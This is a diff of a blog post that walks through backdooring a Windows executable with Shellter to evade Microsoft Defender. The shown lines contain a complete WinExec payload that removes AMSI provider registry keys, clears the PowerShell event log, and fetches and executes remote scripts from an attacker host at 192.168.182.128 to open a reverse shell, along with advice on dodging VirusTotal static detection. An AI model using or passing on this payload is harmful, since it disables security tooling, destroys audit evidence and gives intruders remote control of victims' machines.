MrTiz/MrTiz.github.io/_posts/2025-02-22-defender-evasion-shellter-hoaxshell.md

 ![](/assets/img/defender-evasion-shellter-hoaxshell/shellter1.png)
 ![](/assets/img/defender-evasion-shellter-hoaxshell/shellter2.png)

-Paradoxically, enabling **Stealth Mode** makes the Trojan much more detectable by static analysis on VirusTotal, which is why I chosed to disable it, thus going to change the general behavior of the executable, which will then stop doing what it was intended to do.
+Paradoxically, enabling **Stealth Mode** makes the trojan much more detectable by static analysis on VirusTotal, which is why I chosed to disable it, thus going to change the general behavior of the executable, which will then stop doing what it was intended to do.

-**WinExec** was chosen as the payload, through which I'm going to execute some of our PowerShell code that will then trigger the actual reverse shell.
+**WinExec** was chosen as the payload, through which I'm going to execute some of my PowerShell code that will then trigger the actual reverse shell.
 Embedding a Meterpreter reverse shell or, more generally, a custom one created with `msfvenom` is a risk; generally speaking, it has a higher probability of being detected by both static and especially dynamic analyses.
+[Trojan:Win32/Meterpreter](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Meterpreter)

-The WinExec payload chosen is the following:
+The **WinExec** payload chosen is the following:
 ```powershell
 cmd /c start /wait /min "" C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass -nop -w hidden -noni -c "Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers*\*' -Force -ea SilentlyContinue; Clear-EventLog -LogName 'Windows PowerShell' -ea SilentlyContinue" & cmd /c start /min "" C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass -nop -w hidden -noni -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.182.128/4m51.ps1'); Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers*\*' -Force -ea SilentlyContinue; Start-Sleep -Seconds 30; iex(New-Object Net.WebClient).DownloadString('http://192.168.182.128/revs.ps1'); Clear-EventLog -LogName 'Windows PowerShell' -ea SilentlyContinue"
 ```